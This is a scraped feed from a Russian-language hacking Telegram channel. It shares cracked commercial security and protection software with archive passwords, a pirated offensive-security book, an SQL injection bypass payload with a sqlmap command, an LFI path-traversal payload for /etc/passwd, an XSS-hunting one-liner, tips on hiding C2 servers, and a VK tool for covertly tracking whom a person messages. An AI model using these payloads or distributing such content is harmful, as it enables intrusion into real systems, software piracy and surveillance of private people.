C.I.T. Security
8.24K subscribers
2.92K photos
266 videos
4.22K files
4.21K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.iss.one/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
VMProtect_Ultimate_Retail_Licensed.7z
194.6 MB
VMProtect Ultimate v3.8.4_1754 Licensed & VMProtect Ultimate v3.8.6 Unlicensed
Sovremennye_Veb-Ataki_I_Expluatatsia_2022.pdf
45.3 MB
Современные веб-атаки и эксплуатация WEB-300, Offensive Security, 2022
Container Security via Dan Nanni, 2023
🖥 Репозиторий: Nesca — сканер сети

Nesca
— это сканер, предназначенный для совместной работы по сканированию сети для обнаружения различных устройств. Он имеет стильный «хакерский» графический интерфейс, который придает ему элитный вид.

— Данный инструмент позволяет легко и быстро сканировать различные диапазоны адресов, и диапазоны доменных имен (DNS-режим), настраивая количество потоков, таймауты и проверяемые порты.

Ссылка на GitHub

#Tools #Network
😁3👍1
burpsuite_pro_v2024.zip
692.2 MB
BurpSuite PRO version 2024.1.1.1
+BurpBountyPro_v2.8.0
ru+eng
+manual
burpsuite_pro_v2024.1.1.1.zip
692.3 MB
pass: 311138

README (en+ru) included, plz read it before run BS.

Happy Hacking! 🥳

Run with Java 18 (JDK for Win included)

+BurpBountyPro_v2.8.0
The Enigma_7.40 _x86_x64.7z
52.9 MB
The Enigma 7.40 x86 & x64
Themida v3.1.8.0.zip
61.8 MB
Themida Company License (Release: 3.1.8.0)
👍1
Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'https://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass
Грязный BASH
однострочник для быстрого обнаружения XSS в файлах PHP
*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities
LFI
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.
*
Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз
*
Tracking Malware Infrastructure

#malware #c2
ВК диалоги - позволяет узнать, с кем переписывается человек в ВК.
Мониторятся интервалы времени, проведённые человеком (и его друзьями) онлайн во ВКонтакте.
Анализируется как одновременное появление онлайн (один написал другому), так и одновременное исчезнование из онлайна.
Для начала наблюдения необходимо только ввести ссылку на человека.

https://vkdia.com/

👉 Подписывайтесь на OSINT Беларусь
MetasploitPro_4.22.2.zip
241 MB
pwd - zer0daylab

Metasploit Pro 4.22.2 - Update 2023092901
🔥4